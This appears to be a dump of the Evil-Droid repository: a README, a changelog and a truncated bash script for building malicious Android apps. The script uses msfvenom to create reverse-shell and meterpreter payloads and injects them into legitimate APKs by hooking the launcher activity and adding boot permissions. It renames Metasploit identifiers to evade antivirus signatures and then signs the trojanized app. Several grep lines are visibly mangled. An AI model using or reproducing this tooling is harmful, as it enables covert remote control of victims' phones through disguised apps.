├── README.md
├── changelog
├── evil-droid
├── icons
├── cmlite.png
├── evil.png
├── fbhacker.png
├── fblite.png
├── remember.txt
└── wifi.png
└── tools
├── apktool.jar
└── doc.txt
/README.md:
--------------------------------------------------------------------------------
1 | ## Evil-Droid Framework . version 0.3
2 | Author: Mascerano Bachir [ dev-labs ]
3 |
4 | ## Legal Disclamer:
5 | The author does not hold any responsibility for the bad use of this tool,
6 | remember this is only for educational purpose.
7 |
8 | ## Description:
9 | Evil-Droid is a framework that create & generate & embed apk payload to penetrate android platforms
10 |
11 | ## Screenshot:
12 | 
13 |
14 | 
15 |
16 |
17 |
18 | ## Dependencies :
19 | 1 - metasploit-framework
20 | 2 - xterm
21 | 3 - Zenity
22 | 4 - Aapt
23 | 5 - Apktool
24 | 6 - Zipalign
25 |
26 | ## Download/Config/Usage:
27 | 1? - Download the tool from github
28 | git clone https://github.com/M4sc3r4n0/Evil-Droid.git
29 |
30 | 2? - Set script execution permission
31 | cd Evil-Droid
32 | chmod +x evil-droid
33 |
34 |
35 | 4?- Run Evil-Droid Framework :
36 | ./evil-droid
37 | see options bellow
38 |
39 |
40 | ## video tutorial:
41 | https://www.youtube.com/watch?v=8u-NHeTdPRE&feature=share old version
42 |
--------------------------------------------------------------------------------
/changelog:
--------------------------------------------------------------------------------
1 | Running v.0.3
2 | --------
3 | - Install zipalign dependence
4 | - Detect erros and terminate services with exit mode
5 | - Fix section bypass av + change icon apk
6 | - Add new method backdoor + autodetect Smali
7 | - Fix apktool build packages apk
8 | - Adding mode running payload in the background
9 |
10 |
--------------------------------------------------------------------------------
/evil-droid:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 | #
3 | # Evil-Droid Framework . version 0.3
4 | # Evil-Droid is a framework that create & generate & embed apk payload to penetrate android platform
5 | #
6 | # Created By Mascerano Bachir .
7 | # Website: http://www.dev-labs.co
8 | # YTB : https://www.youtube.com/c/mascerano%20bachir
9 | # FCB : https://www.facebook.com/kali.linux.pentesting.tutorials
10 | #Speciak thanks to : MrPedroubuntu , Kader Achraf , youcef yahia and Mohammed Yacine
11 | #
12 | # this is an open source tool if you want to modify or add something . Please give me a copy.
13 |
14 | # resize terminal window
15 | resize -s 40 70 > /dev/null
16 | #Colors
17 | cyan='\e[0;36m'
18 | lightcyan='\e[96m'
19 | green='\e[0;32m'
20 | lightgreen='\e[1;32m'
21 | white='\e[1;37m'
22 | red='\e[1;31m'
23 | yellow='\e[1;33m'
24 | blue='\e[1;34m'
25 | Escape="\033";
26 | white="${Escape}[0m";
27 | RedF="${Escape}[31m";
28 | GreenF="${Escape}[32m";
29 | LighGreenF="${Escape}[92m"
30 | YellowF="${Escape}[33m";
31 | BlueF="${Escape}[34m";
32 | CyanF="${Escape}[36m";
33 | Reset="${Escape}[0m";
34 | # Check root
35 | [[ `id -u` -eq 0 ]] > /dev/null 2>&1 || { echo $red "You must be root to run the script"; echo ; exit 1; }
36 | clear
37 | # check internet
38 | function checkinternet()
39 | {
40 | ping -c 1 google.com > /dev/null 2>&1
41 | if [[ "$?" != 0 ]]
42 | then
43 | echo -e $yellow " Checking For Internet: ${RedF}FAILED"
44 | echo
45 | echo -e $red "This Script Needs An Active Internet Connection"
46 | echo
47 | echo -e $yellow " Evil-Droid Exit"
48 | echo && sleep 2
49 | exit
50 | else
51 | echo -e $yellow " Checking For Internet: ${LighGreenF}CONNECTED"
52 | fi
53 | }
54 | checkinternet
55 | sleep 2
56 | #Define options
57 | path=`pwd`
58 | lanip=`hostname -I`
59 | publicip=`dig +short myip.opendns.com @resolver1.opendns.com`
60 | ver="v0.3"
61 | APKTOOL="$path/tools/apktool.jar"
62 | VAR1=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # smali dir renaming
63 | VAR2=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # smali dir renaming
64 | VAR3=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # Payload.smali renaming
65 | VAR4=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # Pakage name renaming 1
66 | VAR5=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # Pakage name renaming 2
67 | VAR6=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # Pakage name renaming 3
68 | VAR7=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # New name for word 'payload'
69 | VAR8=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # New name for word 'metasploit'
70 | perms=' \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n '
71 | echo ""
72 | sleep 1
73 | # spinner for Metasploit Generator
74 | spinlong ()
75 | {
76 | bar=" +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
77 | barlength=${#bar}
78 | i=0
79 | while ((i < 100)); do
80 | n=$((i*barlength / 100))
81 | printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}"
82 | ((i += RANDOM%5+2))
83 | sleep 0.02
84 | done
85 | }
86 | # detect ctrl+c exiting
87 | trap ctrl_c INT
88 | ctrl_c() {
89 | clear
90 | echo -e $red"[*] (Ctrl + C ) Detected, Trying To Exit... "
91 | echo -e $red"[*] Stopping Services... "
92 | apache_svc_stop
93 | postgresql_stop
94 | sleep 1
95 | echo ""
96 | echo -e $yellow"[*] Thanks For Using Evil-Droid :)"
97 | exit
98 | }
99 | #detect system
100 | echo -e $blue
101 | sudo cat /etc/issue.net
102 | #check dependencies existence
103 | echo -e $blue ""
104 | echo "® Checking dependencies configuration ®"
105 | echo " "
106 | # check if metasploit-framework is installed
107 | which msfconsole > /dev/null 2>&1
108 | if [ "$?" -eq "0" ]; then
109 | echo -e $green "[ ✔ ] Metasploit-Framework..............${LighGreenF}[ found ]"
110 | which msfconsole > /dev/null 2>&1
111 | sleep 2
112 | else
113 | echo -e $red "[ X ] Metasploit-Framework -> ${RedF}not found "
114 | echo -e $yellow "[ ! ] Installing Metasploit-Framework "
115 | sudo apt-get install metasploit-framework -y
116 | echo -e $blue "[ ✔ ] Done installing ...."
117 | which msfconsole > /dev/null 2>&1
118 | sleep 2
119 | fi
120 | #check if xterm is installed
121 | which xterm > /dev/null 2>&1
122 | if [ "$?" -eq "0" ]; then
123 | echo -e $green "[ ✔ ] Xterm.............................${LighGreenF}[ found ]"
124 | which xterm > /dev/null 2>&1
125 | sleep 2
126 | else
127 | echo ""
128 | echo -e $red "[ X ] xterm -> ${RedF}not found! "
129 | sleep 2
130 | echo -e $yellow "[ ! ] Installing Xterm "
131 | sleep 2
132 | echo -e $green ""
133 | sudo apt-get install xterm -y
134 | clear
135 | echo -e $blue "[ ✔ ] Done installing .... "
136 | which xterm > /dev/null 2>&1
137 | fi
138 | #check if zenity is installed
139 | which zenity > /dev/null 2>&1
140 | if [ "$?" -eq "0" ]; then
141 | echo -e $green "[ ✔ ] Zenity............................${LighGreenF}[ found ]"
142 | which zenity > /dev/null 2>&1
143 | sleep 2
144 | else
145 | echo ""
146 | echo -e $red "[ X ] Zenity -> ${RedF}not found! "
147 | sleep 2
148 | echo -e $yellow "[ ! ] Installing Zenity "
149 | sleep 2
150 | echo -e $green ""
151 | sudo apt-get install zenity -y
152 | clear
153 | echo -e $blue "[ ✔ ] Done installing .... "
154 | which zenity > /dev/null 2>&1
155 | fi
156 | #Check for Android Asset Packaging Tool
157 | which aapt > /dev/null 2>&1
158 | if [ "$?" -eq "0" ]; then
159 | echo -e $green "[ ✔ ] Aapt..............................${LighGreenF}[ found ]"
160 | which aapt > /dev/null 2>&1
161 | sleep 2
162 | else
163 | echo ""
164 | echo -e $red "[ X ] Aapt -> ${RedF}not found! "
165 | sleep 2
166 | echo -e $yellow "[ ! ] Installing Aapt "
167 | sleep 2
168 | echo -e $green ""
169 | sudo apt-get install aapt -y
170 | sudo apt-get install android-framework-res -y
171 | clear
172 | echo -e $blue "[ ✔ ] Done installing .... "
173 | which aapt > /dev/null 2>&1
174 | fi
175 | #Check for Apktool Reverse Engineering
176 | which apktool > /dev/null 2>&1
177 | if [ "$?" -eq "0" ]; then
178 | echo -e $green "[ ✔ ] Apktool...........................${LighGreenF}[ found ]"
179 | which aapt > /dev/null 2>&1
180 | sleep 2
181 | else
182 | echo ""
183 | echo -e $red "[ X ] Apktool -> ${RedF}not found! "
184 | sleep 2
185 | echo -e $yellow "[ ! ] Installing Apktool "
186 | sleep 2
187 | echo -e $green ""
188 | sudo apt-get install apktool -y
189 | clear
190 | echo -e $blue "[ ✔ ] Done installing .... "
191 | which apktool > /dev/null 2>&1
192 | fi
193 | #check for zipalign
194 | which zipalign > /dev/null 2>&1
195 | if [ "$?" -eq "0" ]; then
196 | echo -e $green "[ ✔ ] Zipalign..........................${LighGreenF}[ found ]"
197 | which aapt > /dev/null 2>&1
198 | sleep 2
199 | else
200 | echo ""
201 | echo -e $red "[ X ] Zipalign -> ${RedF}not found! "
202 | sleep 2
203 | echo -e $yellow "[ ! ] Installing Zipalign "
204 | sleep 2
205 | echo -e $green ""
206 | sudo apt-get install zipalign -y
207 | clear
208 | echo -e $blue "[ ✔ ] Done installing .... "
209 | which zipalign > /dev/null 2>&1
210 | fi
211 | directory="$path/evilapk"
212 | if [ ! -d "$directory" ]; then
213 | echo "Creating the output directory..."
214 | mkdir $directory
215 | sleep 3
216 | fi
217 | echo -e $red "╔────────────────────────────────────────────────╗"
218 | echo -e $red "| Evil-Droid Framework $ver - Dev-labs.co |"
219 | echo -e $red "| Please do not upload APK to VirusTotal.com |"
220 | echo -e $red "┖────────────────────────────────────────────────┙"
221 | #function ascii banner
222 | function print_ascii_art {
223 | echo -e $lightgreen " . . "
224 | echo -e $lightgreen " M. .M "
225 | echo -e $lightgreen " MMMMMMMMMMM. "
226 | echo -e $lightgreen " .MMM\MMMMMMM/MMM. "
227 | echo -e $lightgreen " .MMM.7MMMMMMM.7MMM. "
228 | echo -e $lightgreen " .MMMMMMMMMMMMMMMMMMM "
229 | echo -e $lightgreen " MMMMMMM.......MMMMMMM "
230 | echo -e $lightgreen " MMMMMMMMMMMMMMMMMMMMM "
231 | echo -e $lightgreen " MMMM MMMMMMMMMMMMMMMMMMMMM MMMM "
232 | echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
233 | echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
234 | echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
235 | echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
236 | echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
237 | echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
238 | echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
239 | echo -e $lightgreen " MMM8 MMMMMMMMMMMMMMMMMMMMM 8MMM "
240 | echo -e $lightgreen " MMMMMMMMMMMMMMMMMMMMM "
241 | echo -e $lightgreen " MMMMMMMMMMMMMMMMMMMMM "
242 | echo -e $lightgreen " MMMMM MMMMM $ver "
243 | echo -e $lightgreen " MMMMM MMMMM "
244 | echo -e $lightgreen " MMMMM MMMMM "
245 | echo -e $lightgreen " MMMMM MMMMM "
246 | echo -e $lightgreen " .MMM. .MMM. "
247 | echo -e $lightgreen " Mascerano Bachir - Dev-labs "
248 | }
249 | #function lhost
250 | function get_lhost()
251 | {
252 | LHOST=$(zenity --title="☢ SET LHOST ☢" --text "Your-Local-ip: $lanip ; Your-Public-ip: $publicip" --entry-text "$lanip" --entry --width 300 2> /dev/null)
253 | }
254 | #function lport
255 | function get_lport()
256 | {
257 | LPORT=$(zenity --title="☢ SET LPORT ☢" --text "example: 4444" --entry-text "4444" --entry --width 300 2> /dev/null)
258 | }
259 | #function payload
260 | function get_payload()
261 | {
262 | PAYLOAD=$(zenity --list --title "☢ EVIL-DROID ☢" --text "\nChose payload option:" --radiolist --column "Choose" --column "Option" TRUE "android/shell/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" FALSE "android/meterpreter_reverse_tcp" FALSE "android/meterpreter_reverse_http" FALSE "android/meterpreter_reverse_https" --width 400 --height 400 2> /dev/null)
263 | }
264 | function get_payload1()
265 | {
266 | PAYLOAD=$(zenity --list --title "☢ EVIL-DROID ☢" --text "\nChose payload option:" --radiolist --column "Choose" --column "Option" TRUE "android/shell/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" --width 400 --height 400 2> /dev/null)
267 | }
268 | #function name
269 | function payload_name()
270 | {
271 | apk_name=$(zenity --title "☢ PAYLOAD NAME ☢" --text "example: evilapk" --entry --entry-text "evilapk" --width 300 2> /dev/null)
272 | }
273 | #function original apk
274 | function orig_apk()
275 | {
276 | orig=$(zenity --title "☢ ORIGINAL APK ☢" --filename=$path --file-selection --file-filter "*.apk" --text "chose the original (apk)" 2> /dev/null)
277 | }
278 | #function change icon
279 | function change_icon()
280 | {
281 | iconos=$(zenity --title "☢ CHOOSE ICON ☢" --filename=$path --file-selection --file-filter "*.png" --text "chose your own icon." 2> /dev/null)
282 | }
283 | #function generate payload
284 | function gen_payload()
285 | {
286 | echo -e $yellow ""
287 | echo "[*] Generating apk payload"
288 | spinlong
289 | xterm -T " GENERATE APK PAYLOAD" -e msfvenom -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -a dalvik --platform android R -o $apk_name.apk > /dev/null 2>&1
290 | }
291 | function embed_payload()
292 | {
293 | echo -e $yellow ""
294 | echo "[*] Embeding apk payload in orginal apk"
295 | spinlong
296 | xterm -T " EMBED APK PAYLOAD" -e msfvenom -x $orig -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -a dalvik --platform android R -o $apk_name.apk > /dev/null 2>&1
297 | }
298 | #function update apktool
299 | function up_apktook()
300 | {
301 | echo -e $yellow ""
302 | echo "[*] Removing 1.apk framework file..."
303 | spinlong
304 | apktool empty-framework-dir --force > /dev/null 2>&1
305 | }
306 | #function apktool
307 | function apk_decomp()
308 | {
309 | echo -e $yellow ""
310 | echo "[*] Decompiling Payload APK..."
311 | spinlong
312 | xterm -T "Decompiling Payload" -e java -jar $APKTOOL d -f -o $path/payload $path/$apk_name.apk > /dev/null 2>&1
313 | rm $apk_name.apk
314 | }
315 | function apk_comp()
316 | {
317 | echo -e $yellow ""
318 | echo "[*] Rebuilding APK file..."
319 | spinlong
320 | xterm -T "Rebuilding APK" -e java -jar $APKTOOL b $path/payload -o evil.apk > /dev/null 2>&1
321 | rm -r payload > /dev/null 2>&1
322 | }
323 | function apk_decomp1()
324 | {
325 | echo -e $yellow ""
326 | echo "[*] Decompiling Original APK..."
327 | spinlong
328 | xterm -T "Decompiling Original" -e java -jar $APKTOOL d -f -o $path/original $orig > /dev/null 2>&1
329 | }
330 | function apk_comp1()
331 | {
332 | echo -e $yellow ""
333 | echo "[*] Rebuilding Backdoored APK..."
334 | spinlong
335 | xterm -T "Rebuilding APK" -e java -jar $APKTOOL b $path/original -o evil.apk > /dev/null 2>&1
336 | rm -r payload > /dev/null 2>&1
337 | rm -r original > /dev/null 2>&1
338 | }
339 | #function errors
340 | function error()
341 | {
342 | rc=$?
343 | if [ $rc != 0 ]; then
344 | echo -e $red ""
345 | echo "【X】 Failed to rebuild backdoored apk【X】"
346 | echo
347 | apache_svc_stop
348 | postgresql_stop
349 | exit $rc
350 | fi
351 | }
352 | function error0()
353 | {
354 | rc=$?
355 | if [ $rc != 0 ]; then
356 | echo -e $red ""
357 | echo "【X】 An Error Was Occured .Ty Again【X】"
358 | echo
359 | apache_svc_stop
360 | postgresql_stop
361 | exit $rc
362 | fi
363 | }
364 | #function apache2 service
365 | function apache_svc_start()
366 | {
367 | service apache2 start | zenity --progress --pulsate --title "PLEASE WAIT..." --text="Start apache2 service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
368 | }
369 | function apache_svc_stop()
370 | {
371 | service apache2 stop | zenity --progress --pulsate --title "PLEASE WAIT..." --text="Stop apache2 service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
372 | }
373 | #function postgresql service
374 | function postgresql_start()
375 | {
376 | service postgresql start | zenity --progress --pulsate --title "PLEASE WAIT..." --text="Start postgresql service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
377 | }
378 | function postgresql_stop()
379 | {
380 | service postgresql stop | zenity --progress --pulsate --title "PLEASE WAIT..." --text="Stop postgresql service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
381 | }
382 | # function adding permission
383 | function perms()
384 | {
385 | echo -e $yellow ""
386 | echo "[*] Adding permission and Hook Smali"
387 | spinlong
388 | package_name=`head -n 2 $path/original/AndroidManifest.xml|grep "&1
389 | package_dash=`head -n 2 $path/original/AndroidManifest.xml|grep "&1
390 | tmp=$package_name
391 | sed -i "5i\ $perms" $path/original/AndroidManifest.xml
392 | rm $path/payload/smali/com/metasploit/stage/MainActivity.smali 2>&1
393 | sed -i "s|Lcom/metasploit|L$package_name|g" $path/payload/smali/com/metasploit/stage/*.smali 2>&1
394 | cp -r $path/payload/smali/com/metasploit/stage $path/original/smali/$package_name > /dev/null 2>&1
395 | rc=$?
396 | if [ $rc != 0 ];then
397 | app_name=`grep "&1
398 | app_dash=`grep "&1
399 | tmp=$app_name
400 | sed -i "s|L$package_name|L$app_name|g" $path/payload/smali/com/metasploit/stage/*.smali 2>&1
401 | cp -r $path/payload/smali/com/metasploit/stage $path/original/smali/$app_name > /dev/null 2>&1
402 | amanifest=" "
403 | boot_cmp=' \n \n \n \n '
404 | sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1
405 | fi
406 | amanifest=" "
407 | boot_cmp=' \n \n \n \n '
408 | sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1
409 | android_nam=$tmp
410 | }
411 | # functions hook smali
412 | function hook_smalies()
413 | {
414 | launcher_line_num=`grep -n "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml |awk -F ":" 'NR==1{ print $1 }'` 2>&1
415 | android_name=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "&1
416 | android_activity=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "&1
417 | android_targetActivity=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "&1
418 | if [ $android_name ]; then
419 | echo
420 | echo "##################################################################"
421 | echo "inject Smali: $android_name.smali" |awk -F ":/" '{ print $NF }'
422 | hook_num=`grep -n " return-void" $path/original/smali/$android_name.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1
423 | echo "In line:$hook_num"
424 | echo "##################################################################"
425 | starter=" invoke-static {}, L$android_nam/stage/MainService;->start()V"
426 | sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_name.smali > /dev/null 2>&1
427 | elif [ ! -e $android_activity ]; then
428 | echo
429 | echo "##################################################################"
430 | echo "inject Smali: $android_activity.smali" |awk -F ":/" '{ print $NF }'
431 | hook_num=`grep -n " return-void" $path/original/smali/$android_activity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1
432 | echo "In line:$hook_num"
433 | echo "##################################################################"
434 | starter=" invoke-static {}, L$android_nam/stage/MainService;->start()V"
435 | sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_activity.smali > /dev/null 2>&1
436 | rc=$?
437 | if [ $rc != 0 ]; then
438 | spinlong
439 | echo -e $red ""
440 | echo "[x] cant find : $android_activity.smali"
441 | echo "[*] try another ..."
442 | spinlong
443 | sleep 2
444 | echo
445 | echo "##################################################################"
446 | echo "inject Smali: $android_targetActivity.smali" |awk -F ":/" '{ print $NF }'
447 | hook_num=`grep -n " return-void" $path/original/smali/$android_targetActivity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1
448 | echo "In line:$hook_num"
449 | echo "##################################################################"
450 | starter=" invoke-static {}, L$android_nam/stage/MainService;->start()V"
451 | sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_targetActivity.smali > /dev/null 2>&1
452 | fi
453 | fi
454 | }
455 | #function flagged by av & updating smalies
456 | function flagg()
457 | {
458 | echo -e $yellow ""
459 | echo "[*] Scrubbing the payload contents to avoid AV signatures..."
460 | spinlong
461 | mv payload/smali/com/metasploit payload/smali/com/$VAR1
462 | mv payload/smali/com/$VAR1/stage payload/smali/com/$VAR1/$VAR2
463 | mv payload/smali/com/$VAR1/$VAR2/Payload.smali payload/smali/com/$VAR1/$VAR2/$VAR3.smali
464 | sleep 2
465 | if [ -f payload/smali/com/$VAR1/$VAR2/PayloadTrustManager.smali ]; then
466 | echo
467 | echo -e $red "[ X ] an error was occured . Please upgrade your distro .."
468 | apache_svc_stop
469 | postgresql_stop
470 | exit 1
471 | fi
472 | sed -i "s#/metasploit/stage#/$VAR1/$VAR2#g" payload/smali/com/$VAR1/$VAR2/*
473 | sed -i "s#Payload#$VAR3#g" payload/smali/com/$VAR1/$VAR2/*
474 | sed -i "s#com.metasploit.meterpreter.AndroidMeterpreter#com.$VAR4.$VAR5.$VAR6#" payload/smali/com/$VAR1/$VAR2/$VAR3.smali
475 | sed -i "s#payload#$VAR7#g" payload/smali/com/$VAR1/$VAR2/$VAR3.smali
476 | sed -i "s#com.metasploit.stage#com.$VAR1.$VAR2#" payload/AndroidManifest.xml
477 | sed -i "s#metasploit#$VAR8#" payload/AndroidManifest.xml
478 | sed -i "s#MainActivity#$apk_name#" payload/res/values/strings.xml
479 | sed -i '/.SET_WALLPAPER/d' payload/AndroidManifest.xml
480 | sed -i '/WRITE_SMS/a' payload/AndroidManifest.xml
481 | }
482 | function flagg_original()
483 | {
484 | echo -e $yellow ""
485 | echo "[*] Scrubbing the payload contents to avoid AV signatures..."
486 | spinlong
487 | rm $path/payload/smali/com/metasploit/stage/MainActivity.smali 2>&1
488 | mv payload/smali/com/metasploit/stage payload/smali/com/metasploit/$VAR1
489 | mv payload/smali/com/metasploit/$VAR1/MainBroadcastReceiver.smali payload/smali/com/metasploit/$VAR1/$VAR2.smali
490 | mv payload/smali/com/metasploit/$VAR1/MainService.smali payload/smali/com/metasploit/$VAR1/$VAR3.smali
491 | mv payload/smali/com/metasploit/$VAR1/Payload.smali payload/smali/com/metasploit/$VAR1/$VAR4.smali
492 | sleep 2
493 | if [ -f payload/smali/com/metasploit/$VAR1/PayloadTrustManager.smali ]; then
494 | echo
495 | echo -e $red "[ X ] an error was occured . Please upgrade your distro .."
496 | apache_svc_stop
497 | postgresql_stop
498 | exit 1
499 | fi
500 | echo -e $yellow ""
501 | echo "[*] Adding permission and Hook Smali"
502 | spinlong
503 | sed -i "5i\ $perms" $path/original/AndroidManifest.xml
504 | package_name=`head -n 2 $path/original/AndroidManifest.xml|grep "&1
505 | package_dash=`head -n 2 $path/original/AndroidManifest.xml|grep "&1
506 | tmp=$package_name
507 | sed -i "s|Lcom/metasploit/stage|L$package_name/$VAR1|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
508 | sed -i "s|L$package_name/$VAR1/Payload|L$package_name/$VAR1/$VAR4|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
509 | sed -i "s|L$package_name/$VAR1/MainService|L$package_name/$VAR1/$VAR3|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
510 | sed -i "s|L$package_name/$VAR1/MainBroadcastReceiver|L$package_name/$VAR1/$VAR2|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
511 | cp -r $path/payload/smali/com/metasploit/$VAR1 $path/original/smali/$package_name > /dev/null 2>&1
512 | rc=$?
513 | if [ $rc != 0 ];then
514 | app_name=`grep "&1
515 | app_dash=`grep "&1
516 | tmp=$app_name
517 | sed -i "s|L$package_name/$VAR1|L$app_name/$VAR1|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
518 | sed -i "s|L$app_name/$VAR1/$VAR4|L$app_name/$VAR1/$VAR4|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
519 | sed -i "s|L$app_name/$VAR1/$VAR3|L$app_name/$VAR1/$VAR3|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
520 | sed -i "s|L$app_name/$VAR1/$VAR2|L$app_name/$VAR1/$VAR2|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
521 | cp -r $path/payload/smali/com/metasploit/$VAR1 $path/original/smali/$app_name > /dev/null 2>&1
522 | amanifest=" "
523 | boot_cmp=' \n \n \n \n '
524 | sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1
525 | fi
526 | amanifest=" "
527 | boot_cmp=' \n \n \n \n '
528 | sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1
529 | android_nam=$tmp
530 | launcher_line_num=`grep -n "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml |awk -F ":" 'NR==1{ print $1 }'` 2>&1
531 | android_name=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "&1
532 | android_activity=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "&1
533 | android_targetActivity=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "&1
534 | if [ $android_name ]; then
535 | echo
536 | echo "##################################################################"
537 | echo "inject Smali: $android_name.smali" |awk -F ":/" '{ print $NF }'
538 | hook_num=`grep -n " return-void" $path/original/smali/$android_name.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1
539 | echo "In line:$hook_num"
540 | echo "##################################################################"
541 | starter=" invoke-static {}, L$android_nam/$VAR1/$VAR3;->start()V"
542 | sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_name.smali > /dev/null 2>&1
543 | elif [ ! -e $android_activity ]; then
544 | echo
545 | echo "##################################################################"
546 | echo "inject Smali: $android_activity.smali" |awk -F ":/" '{ print $NF }'
547 | hook_num=`grep -n " return-void" $path/original/smali/$android_activity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1
548 | echo "In line:$hook_num"
549 | echo "##################################################################"
550 | starter=" invoke-static {}, L$android_nam/$VAR1/$VAR3;->start()V"
551 | sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_activity.smali > /dev/null 2>&1
552 | rc=$?
553 | if [ $rc != 0 ]; then
554 | spinlong
555 | echo -e $red ""
556 | echo "[x] cant find : $android_activity.smali"
557 | echo "[*] try another ..."
558 | spinlong
559 | sleep 2
560 | echo
561 | echo "##################################################################"
562 | echo "inject Smali: $android_targetActivity.smali" |awk -F ":/" '{ print $NF }'
563 | hook_num=`grep -n " return-void" $path/original/smali/$android_targetActivity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1
564 | echo "In line:$hook_num"
565 | echo "##################################################################"
566 | starter=" invoke-static {}, L$android_nam/$VAR1/$VAR3;->start()V"
567 | sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_targetActivity.smali > /dev/null 2>&1
568 | fi
569 | fi
570 | }
571 | # function chage name and icon
572 | function merge_name_ico()
573 | {
574 | echo -e $yellow ""
575 | echo "[*] Changing name and icon payload..."
576 | spinlong
577 | label=' '
578 | label1=' '
579 | sed -i "s|$label|$label1|g" $path/payload/AndroidManifest.xml 2>&1
580 | sed -i "s|MainActivity|$apk_name|g" $path/payload/res/values/strings.xml 2>&1
581 | mkdir $path/payload/res/drawable
582 | cp $iconos $path/payload/res/drawable/main_icon.png
583 | }
584 | #function signing apk
585 | function sign()
586 | {
587 | echo -e $yellow ""
588 | echo "[*] Checking for ~/.android/debug.keystore for signing..."
589 | spinlong
590 | if [ ! -f ~/.android/debug.keystore ]; then
591 | echo -e $red ""
592 | echo " [ X ] Debug key not found. Generating one now..."
593 | spinlong
594 | if [ ! -d "~/.android" ]; then
595 | mkdir ~/.android > /dev/null 2>&1
596 | fi
597 | echo -e $lightgreen ""
598 | keytool -genkey -v -keystore ~/.android/debug.keystore -storepass android -alias androiddebugkey -keypass android -keyalg RSA -keysize 2048 -validity 10000
599 | fi
600 | spinlong
601 | echo -e $yellow ""
602 | echo "[*] Attempting to sign the package with your android debug key"
603 | spinlong
604 | jarsigner -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA evil.apk androiddebugkey > /dev/null 2>&1
605 | echo -e $yellow
606 | echo "[*] Verifying signed artifacts..."
607 | spinlong
608 | jarsigner -verify -certs evil.apk > /dev/null 2>&1
609 | rc=$?
610 | if [ $rc != 0 ]; then
611 | echo -e $red ""
612 | echo "[!] Failed to verify signed artifacts"
613 | apache_svc_stop
614 | postgresql_stop
615 | exit $rc
616 | fi
617 | echo -e $yellow
618 | echo "[*] Aligning recompiled APK..."
619 | spinlong
620 | zipalign 4 evil.apk $apk_name.apk 2>&1
621 | rc=$?
622 | echo -e $yellow
